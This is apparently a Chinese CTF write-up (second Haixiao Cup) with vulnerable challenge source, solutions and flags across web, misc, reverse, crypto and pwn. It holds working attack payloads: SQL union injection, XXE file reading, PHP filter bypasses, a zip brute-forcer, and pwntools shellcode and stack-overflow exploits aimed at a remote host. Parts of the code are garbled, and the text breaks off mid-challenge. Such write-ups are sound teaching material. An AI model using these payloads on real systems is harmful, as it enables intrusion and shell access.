第二届海啸杯网络安全挑战赛write up

s

WEB

1+1=?

  • 题目描述

    ​ 这是一道小学计算题


  • 考点

    • 正则绕过

  • 难度

    ​ ★★★★


  • 题目源码

  • index.php

    <?php
    error_reporting(0);
    function get_the_f2ag(){
          echo file_get_contents('flag.php');
    }
    

@$gf = $GET[‘s’];
if (!$gf ){
highlight_file(_FILE
);
}

if(strlen($gf)>40){
die(‘One inch long, one inch strong!’);
}
if(!preg_match(‘/[0-9]|~|^|$|[A-Z|m-s|w-z|i-k|b-d|||{}|%]/‘, $gf)){
eval($gf);
}else{
die(‘No!’);
}

?>

- waf.php

```php
<?php
error_reporting(0);
if(!preg_match('/eval/', $_GET['s'])&&isset($_GET['s'])){
    foreach (get_defined_functions()['internal'] as $fun) {
        if(preg_match('/'.$fun.'/m', $_GET['s'])){
            die('NO Hacking!');
        }
    }
}
?>
  • .user.ini
auto_prepend_file=waf.php

  • 解题思路

第一个正则过滤了大部分函数但是eval并没有过滤,第二个正则过滤了数字、取反、异或、$符、大写字母、部分小写字母以及其他字符。题目的整体意思是构造出get_the_f2ag();让eval去调用。但是get_the_f2ag()含有数字,那么就需要想办法把数字构造出来。

其中!a=0那么!!a=1,两个相加再拼接成字符串

'get_the_f'.(!!'a'%2b!!'a').'ag();'

那么需要执行两次php代码,那么最终payload

?s=eval('get_the_f'.(!!'a'%2b!!'a').'ag();');

这里注意的是加号需要转码为url编码,因为加号在url中是空格。

  • flag
flag{i_want_to_have_a_girlfriend_666}

宁静致远

  • 题目描述

    The quieter you become. The more you are able to hear.


  • 考点

    cookie编码(base64)后的注入

  • 难度

    • ★★

  • 题目源码

<?php
date_default_timezone_get('Asia/Shanghai');
header("Content-Type:text/html;charset=utf-8");
$server='127.0.0.1';
$username='root';
$passwd='root';
$db='ctf';
$conn =  new mysqli($server,$username,$passwd,$db);
if($conn->connect_error<>0){
    die("sql error");
}else{
    $conn->set_charset("utf8")or die("设置字符失败".$conn->error);
}

setcookie("hexo", "MQ==", time()+360);
$user = $_COOKIE['hexo'];
$check = base64_decode($user);
$sql = "select * from user where id = '$check'";

$result = $conn->query($sql);
$info = $result->fetch_array(MYSQL_ASSOC);
echo $info['user'];
?>
  • 解题思路

    • 抓包后发现cookie有个hexo参数十分奇怪.base64编码,解码后发现是1,于是sql联合注入

    • hexo=-1'union select 1,(select group_concat(flag)from ctf.flag) -- 
    • base64编码传入

    • hexo=LTEndW5pb24gc2VsZWN0IDEsKHNlbGVjdCBncm91cF9jb25jYXQoZmxhZylmcm9tIGN0Zi5mbGFnKSAtLSA=

img


Gzmtu学生?

  • 题目描述

    你是Gzmtu的学生吗?


  • 考点

    • 未授权访问,ip伪造

  • 难度

    ​ ★


  • 题目源码

    <?php
    setcookie("user", "0", time()+360);
    if(@$_SERVER["HTTP_X_FORWARDED_FOR"]!="127.0.0.1"){
        die("u no student in Gzmtu");
    }else{
        if($_COOKIE['user']==1){
         echo "flag{welcom_to_GZMTU_56456s4awdawdafafa}";        
        }else{
            die("u no admin!");
        }    
    }
    ?>
  • 解题思路

    xff伪造ip为127.0.0.1然后改cookie未授权访问即可获取到flag

  • flag

    flag{welcom_to_GZMTU_56456s4awdawdafafa}

Who are you ?

  • 题目描述

    XXE


  • 考点

    • XXE外部实体注入

  • 难度

    ​ ★★


  • 题目源码
    <?php
    libxml_disable_entity_loader(false);
    $data = @file_get_contents('php://input');
    $resp = '';
    //$flag='flag{79d10626-d27f-4569-a629-c9606d0378f2}';
    if($data != false){
      $dom = new DOMDocument();
      $dom->loadXML($data, LIBXML_NOENT);
      ob_start();
      $res  = $dom->textContent;
      $resp = ob_get_contents();
      ob_end_clean();
      if ($res){
          die($res);
      }
    

}
?>

welcome
</div>


<form method="post" class="form">
    <h1 id="title">请输入姓名</h1>
    <br/>
    <br/>
    <br/>
    <input type="text" class="name entry " id="name" name="name" placeholder="Your Name"/>
</form>
<button class="submit entry" onclick="func()">Submit</button>

<div class="shadow"></div>
```
  • 解题思路

    xxe外部实体注入+伪协议读取源码

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]>
    
    <feedback>
    <author>&xxe;</author>
    </feedback>
  • flag

    flag{79d10626-d27f-4569-a629-c9606d0378f2}

EasyWeb

  • 题目描述

    EasyWeb


  • 考点

    • 双重绕过

  • 难度

    ​ ★★


  • 题目源码
<?php
//flag in flag.php
@$payload = $_GET['s'];
if(!isset($_GET['s'])){
    highlight_file(__FILE__); 
    die();
}
$payload=str_replace(['php','flag'], '', $payload);
if(!empty($payload)&&preg_match('/flag/', @$_GET['x'])==md5(@$_GET['x'])&&!empty($_GET['x']))
    echo file_get_contents($payload);

?>
  • 解题思路
index.php?s=flaflagg.phflagp&x[]=1
  • flag
flag{Hello_Gzmtu_66666666666}

MISC

签到题

  • 题目描述

    this is a pic.


  • 考点

    • base64编码解码

  • 难度

    ​ ☆


  • 题目源码
iVBORw0KGgoAAAANSUhEUgAAAfQAAADICAIAAACRe4S/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAGjWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDIgNzkuMTYwOTI0LCAyMDE3LzA3LzEzLTAxOjA2OjM5ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOnhtcE1NPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvbW0vIiB4bWxuczpzdEV2dD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL3NUeXBlL1Jlc291cmNlRXZlbnQjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ0MgKFdpbmRvd3MpIiB4bXA6Q3JlYXRlRGF0ZT0iMjAxOS0wOC0xN1QyMzoyNjo0NiswODowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAxOS0wOC0xN1QyMzoyNzo0MCswODowMCIgeG1wOk1vZGlmeURhdGU9IjIwMTktMDgtMTdUMjM6Mjc6NDArMDg6MDAiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NDk4MTViMzgtZjA2YS1mNTQ4LWFhY2YtNDljOTgzMGIyNGMzIiB4bXBNTTpEb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6YjE2Yzg5ZTQtMzU1NC00MDRmLWFlYjEtMDY1M2U0OGFiYzBiIiB4bXBNTTpPcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6ODk3ODcyOTYtMmY0Ni1hOTQ4LWJiYmUtZWQ0MjFmNzcwMzFlIiBwaG90b3Nob3A6Q29sb3JNb2RlPSIzIiBkYzpmb3JtYXQ9ImltYWdlL3BuZyI+IDx4bXBNTTpIaXN0b3J5PiA8cmRmOlNlcT4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImNyZWF0ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6ODk3ODcyOTYtMmY0Ni1hOTQ4LWJiYmUtZWQ0MjFmNzcwMzFlIiBzdEV2dDp3aGVuPSIyMDE5LTA4LTE3VDIzOjI2OjQ2KzA4OjAwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgQ0MgKFdpbmRvd3MpIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDpmODIzZDcwNi0zMWI1LTBlNDYtOTdjYi0wMjE2ZWNiZjZjNTQiIHN0RXZ0OndoZW49IjIwMTktMDgtMTdUMjM6MjY6NDYrMDg6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCBDQyAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOjQ5ODE1YjM4LWYwNmEtZjU0OC1hYWNmLTQ5Yzk4MzBiMjRjMyIgc3RFdnQ6d2hlbj0iMjAxOS0wOC0xN1QyMzoyNzo0MCswODowMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIENDIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7heTAAAAAM1UlEQVR4nO3d73mi2hbHcXKf+x6mApkKZCqQqSCcCjQVxA7CVKCngmAFkgqCFQxWIFYwUEHu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
  • 解题思路

    base64解码保存为png图片即可出来flag

    import base64
    f = open(r'flag.txt','r')
    
    s = f.read()
    
    print()
    # coding: utf-8
    f2 = open(r'flag.png','w')
    flag = str(base64.b64decode(s))
    f2.write(flag)
    f2.close()
    f.close()
  • flag

    flag{I_LOVE_CHINA}

    小明的求助

  • 题目描述

    小明女朋友发了个重要文件压缩包给他,在传输过程中发生了错误导致压缩包损坏,而且密码他只知道”hlqiou”加上4位数字,如果打不开这个文件他女朋友将离他而去,你能帮助他吗?


  • 考点

    • 文件头修复
    • 安全编程

  • 难度

    ​ ★★

  • 解题思路

    文件头损坏修复文件头为zip

    编写解压脚本爆破压缩包

  # -*-coding:utf-8-*-
  import zipfile
  import re


  def main():
      with zipfile.ZipFile('test/xiaoming.zip') as zFile:#创建ZipFile对象
          for i in range(1000,9999):
              password="hlqiou"+str(i)
              try:
                  zFile.extractall(path='./test/flag', pwd=bytes(password, encoding="utf8"))
                  print(password)
              except Exception as e:
                  pass


  if __name__=='__main__':
      main()
  • flag
flag{5oiR54ix6buE6I6J6I2D}

老烟枪

  • 题目描述

    老烟枪


  • 考点

    • 图片隐写术

  • 难度

    ​ ★


  • 解题思路

binwalk分离,或者手工分离

binwalk -e 666.jpg
  • flag
flag{WW91IGxvb2sgc2VyaW91cywgbGlrZSBDYWkgWHVrdW4u}

抓黑客

  • 题目描述

    某学校服务器遭受到黑客入侵,管理员及时保留了服务器日志,已知黑客在服务器增加了一个root权限的用户,请你通过日志审计找出该用户第一次登陆的用户名、时间和ip,flag格式:

    用户名+时间+ip

    如:xiaoming+12:00+127.0.0.1


  • 考点

    • 日志审计

  • 难度

    ​ ★


  • 解题思路

直接搜索“Accepted ”即可找出登陆成功的用户信息:

grep "Accepted " auth.log | awk '{print $1,$2,$3,$9,$11}'
  • flag
  mysq1+10:34:30+172.16.5.143

表白

  • 题目描述

    小明女神给他发了个文件,他却不知道如何打开你能帮助他吗?

  • 考点

    - zip伪加密
    - PNG高度隐藏

  • 难度

    ★★☆

  • 解题思路

    解除伪加密,爆破高度

Reverse

Baby reverse

  • 题目描述
  • 考点

    - IDA操作

  • 难度

    ​ ☆


  • 解题思路

img

利用ida的字符串搜索功能找出flag

img


flag

flag{reverse_is_easy}

Easy reverse

  • 题目描述

    ​ 简单的运算

  • 考点

    - ida反编译的使用
    • 简单的算法逆向

  • 难度


  • 解题思路

img

主要算法,将输入的字符串异或0xC在加1

解密脚本:

key = "kanlxvdzTljyTfyTeuor"
flag=""
for i in key:
    flag += chr((ord(i)-1)^0xC)
print flag    

img

霸王别姬

  • 题目描述

    小明要煮个鳖顿乌鸡汤,不知道壳怎么脱

  • 考点

    - 脱壳

  • 难度

    ★★

  • 解题思路

img

img

img

加壳后的文件函数和逻辑都被隐藏

考点:识辨upx加壳,并且手动或工具脱掉upx加壳

解法一 工具脱壳

img

img

脱壳后即可看到flag

解法二 ESP定律法

OD载入

img

发现ESP突变

img

右键esp,选择数据窗口跟随

img

选择数据窗口的第一个数据,右键选择硬件访问,断下硬件断点,运行。

img

发现大跳转,即为进入OEP

img

用OD自带的插件脱壳

img

将脱壳后的文件放入ida中,虽然upx没有脱干净,但是可以看到程序的主要函数以及隐藏的flag

img


电竞选手

  • 题目描述

    听说CTF选手常用WASD?

  • 考点

    - 逆向

  • 难度

    ★★★★

  • 解题思路

将程序用ida载入查看逻辑

img

发现关键的判断句,当两个函数返回为1时则输入值为flag,首先看sub_401350函数

img

sub_40145A函数

img

迷宫

##....####
##.##.###.
##.##.###.
...##.###.
.####.....
.####.#.##
.####...##
....######
###.###+##
###.....##

走完迷宫到达+的位置即为flag

img


Cryptography

恺撒将军

  • 题目描述

    恺撒将军使用了一种技术运筹帷幄,指挥千里将士决胜千里。

    敌军正好截获了一串密文:]p{k]6wmfqozgJ<id[QidKkl[6Qy[5YEf6nziT@@

    offset: 3

  • 考点

    - 凯撒密码
    - base64解码

  • 难度

    ★★

  • 解题思路

    加密算法:将给定的flag中的每个字符后移3位,并将偏移后的字符串base64编码

    加密脚本:

    flag = "flag{crypto_is_hxb_so_eAsy0}"
    
    result = flag.encode("base64")
    
    print result
    
    encode_flag = ""
    
    for i in result:
        encode_flag += chr((ord(i)+3)%128)
    
    print encode_flag

    解密脚本:

    result="]p{k]6wmfqozgJ<id[QidKkl[6Qy[5YEf6nziT@@"
    
    flag=""
    
    for i in result:
        flag += chr(ord(i)-3)
    
    print flag.decode("base64")

小明家的小菜园

  • 题目描述

    小明家菜园要建栅栏,请教了他心爱的女神,女神给了这么点提示,他却看不懂,你能帮助他吗?:

    f_tnluz_aghggeao{t_oy_ldoia}

  • 考点

    - 栅栏密码

  • 难度

    ★★

  • 解题思路

    由于栅栏数较小,因此不给出栅栏数提示,可以用网上的栅栏密码解密或手写脚本爆破栅栏数解密

    加密脚本:

flag = "flag{yo_uget_itzha_lan_good}"

#flag{yo _uget_i tzha_la n_good}

k = 7 

flag {yo_ uget _itz ha_l an_g ood}

f_tn

encode_flag=""



for i in range(7):
    for j in range(4):
        encode_flag += flag[j*7+i]

print encode_flag

​ 解密脚本:


encode_flag = "f_tnluz_aghggeao{t_oy_ldoia}"

for k in range(1,29):
    flag=""
    num = 28/k
    for i in range(k):
        for j in range(num):
            flag += encode_flag[j*k+i]
    if "flag" in flag:
        print "k:"+str(28/k)+"\n"+"flag:\n"+flag+"\n"

战报

  • 描述:

    我军成功捣毁敌军秘密电台缴获密文和明文一份,但是还有一份密文难以破解特请你来破译密码:

密文:
jivsyisgmlirgbggvuocevsivnsoevszotfloymivnmozwgitmbyfevtgugvffecgmflgtglimbggvjgmmuocevsivnijofcotgsoevsklgvflgkotjnkimmfejjhohyjifgnbwlyvfgtsiflgtgtmmcijjfeslfjwqvefstoyhmngrgjohgnflgetokvhiffgtvmozmhggulevnghgvngvfozgiuloflgtmocgjivsyisggdhgtfmbgjegrgflifwgitmisoklgvflgkotjnlinxymfzergfofgvcejjeovhgohjgflgwmhoqghgtlihmjivsyisgmbgfkggvflgcmoovizfgtkitnmcivwozflomghgohjgmfitfgnmgffjevsnokvfobguocgzitcgtmivnflgetjivsyisgmfoobguicgcotgmgffjgnivnzgkgtevvycbgtevtgugvfugvfytegmftingevnymfteijemifeovflgngrgjohcgvfozflgvifeovmfifgivnflgmhtginozyvergtmijuochyjmotwgnyuifeovgmhgueijjwsjobijemifeovivnbgffgtuoccyveuifeovmevflghimfzgknguingmijjlirguiymgncivwjivsyisgmfonemihhgitivnnocevivfjivsyisgmmyulimgvsjemlmhivemlivnulevgmgitgevutgimevsjwfiqevsorgtifhtgmgvfflgkotjnlimiboyfjivsyisgmflgnemftebyfeovozflgmgjivsyisgmemlysgjwyvgrgvflgsgvgtijtyjgemflifcejnpovgmlirgtgjifergjwzgkjivsyisgmozfgvmhoqgvbwcivwhgohjgklejglofkgfpovgmlirgjofmozfgvmhoqgvbwmcijjvycbgtmgytohglimovjwitoyvnjivsyisgmflgicgteuimiboyfizteuiivnimeiivnflghiuezeuhgtlihmozkleulhihyivgksyevgiijovgiuuoyvfmzotkgjjorgtflgcgneivvycbgtozmhgiqgtmemcgtgkleulfliflijzflgkotjnmjivsyisgmitgmhoqgvbwzgkgthgohjgflivflifijtginwkgjjorgtozflgfofijozjivsyisgmitgujomgfogdfevufeovkeflovjwizgkgjngtjwmhgiqgtmjgzfheuqiftivnocbymyyevuicgtoovgeslftgcievevsmhgiqgtmuleihivguoevcgdeuojehivihiulgevflgyvefgnmfifgmfkootfltggotkinxesyeviymftijeiovgkefliaygmfeovcitqvovgozflgmgmggcmfolirgcyululivugozmytrerij
明文:
Languages have been coming and going for thousands of years, but in recent times there has been less coming and a lot more going. When the world was still populated by hunter-gatherers,small,tightly knit(联系)groups developed their own patterns of speech independent of each other. Some language experts believe that 10,000 years ago, when the world had just five to ten million people, they spoke perhaps 12, 000 languages between them.Soon afterwards, many of those people started settling down to become farmers, and their languages too became more settled and fewer in number. In recent centuries, trade, industrialisation, the development of the nation-state and the spread of universal compulsory education, especially globalisation and better communications in the past few decades, all have caused many languages to disappear, and dominant languages such as English,Spanish and Chinese are increasingly taking over.At present, the world has about 6, 800 languages. The distribution of these languages is hugely uneven. The general rule is that mild zones have relatively few languages, often spoken by many people, while hot wet zones have lots, often spoken by small numbers. Europe has only around 200 languages; the Americas about 1, 000; Africa 2, 400; and Asia and the Pacific perhaps 3,200, of which Papua New Guinea alone accounts for well over 800.The median number(中位数) of speakers is mere 6,000, which that half the world's languages are spoken by fewer people than that.Already well over 400 of the total of 6, 800 languages are close to extinction (消亡), with only a few elderly speakers left. Pick, at random, Busuu in Cameroon (eight remaining speakers), Chiapaneco in Mexico (150), Lipan Apache in the United States (two or three) or Wadjigu in Australia (one, with a question-mark): none of these seems to have much chance of survival

待解密文:

givfome
  • 解题过程

    • 进行字频统计得出如下结果

      e =>g
      a =>i
      n =>v
      t =>f
      o =>o
      s =>m
      i =>e
      r =>j
      l =>t
      h =>l
      u =>y
      d =>s
      g =>h
      p =>n
      c =>u
      m =>c
      f =>z
      w =>k
      y =>b
      v =>w
      k =>r
      c =>q
      p =>d
      t =>p
      x =>x
      j =a
  • 加密脚本

table = ['p','q','r','s','t','u','v','w','x','y','z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o']
s = "eantosi"
m = ""
for i in s:
    k=0
    for j in table:
        i = i.lower()
        if j == i:
            l =(19*k+18)%26    
            m = m + table[l]
            break
        else:
            k = k+1    
print(m)

flag

flag{eantosi}

Pwn

shellcode

  • 题目描述

    nc 139.199.10.70 10003

  • 考点

    - shellcode

  • 难度

    ★★

  • 题目源码
#include <stdio.h>
  #include <unistd.h>

  int main()
  {
      setbuf(stdin, 0);
      setbuf(stdout, 0);
      setbuf(stderr, 0);
      printf("欢迎参加海啸杯?\n");
      printf("你听说过shellcode嘛?\n");
      printf("input:\n");
      read(0, shellcode, 1023);
      (*(void (*)()) shellcode)();
  }
  #flag{7aa4aa9d-bb79-48e8-860a-266cf870a8ff}
  • 解题思路

直接输入一段字符,并且作为函数调用这段字符,由于题目保护全关,因此输入一段shellcode即可获得shell

解题脚本:

from pwn import *

#sh = process("./shellcode")

sh = remote("139.199.10.70",10003)

shellcode = asm(shellcraft.sh()) #输入一段shellcode

sh.sendline(shellcode)

sh.interactive()

flag

flag{7aa4aa9d-bb79-48e8-860a-266cf870a8ff}

simple_stackoverflow

  • 题目描述

    nc 139.199.10.70 10004

  • 考点

    • shellcode
    • 栈转移

  • 难度

    ★★★


  • 题目源码
#include <stdio.h>
#include <unistd.h>

int overflow()
{
    char buf[24];
    read(0, buf, 1023);
    return 0;
}

int main()
{
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    overflow();
}

#flag{5fa84896-6696-4d3f-a85c-41d0de6a5515}
  • 解题思路

题目一样保护全关,但是输入shellcode后却不知道shellcode的返回地址,因此需要将栈转移,将栈转移到.bss段写下shellcode并返回到.bss段调用shellcode得到shell

解题脚本:

from pwn import *

#sh = process("./simple_stackoverflow2")

sh = remote("139.199.10.70",10004)

bss_address =  0x804a040

shellcode = asm(shellcraft.sh())

payload = "a"*(0x20+4)  + p32(0x08048390)+p32(bss_address) + p32(0) + p32(bss_address) + p32(len(shellcode)) 

sh.sendline(payload)

#time.sleep(1)

sh.send(shellcode)

sh.interactive()

flag

flag{5fa84896-6696-4d3f-a85c-41d0de6a5515}

rop

  • 题目描述

    nc 139.199.10.70 10007

  • 考点

    • ROP
    • 系统调用好 int0x80

  • 难度

    ★★★★


  • 题目源码
#include <stdio.h>
#include <stdlib.h>

char *shell = "/bin/sh";

int main(void)
{
    setvbuf(stdout, 0LL, 2, 0LL);
    setvbuf(stdin, 0LL, 1, 0LL);

    char buf[100];

    printf("This time, no system() and NO SHELLCODE!!!\n");
    printf("What do you plan to do?\n");
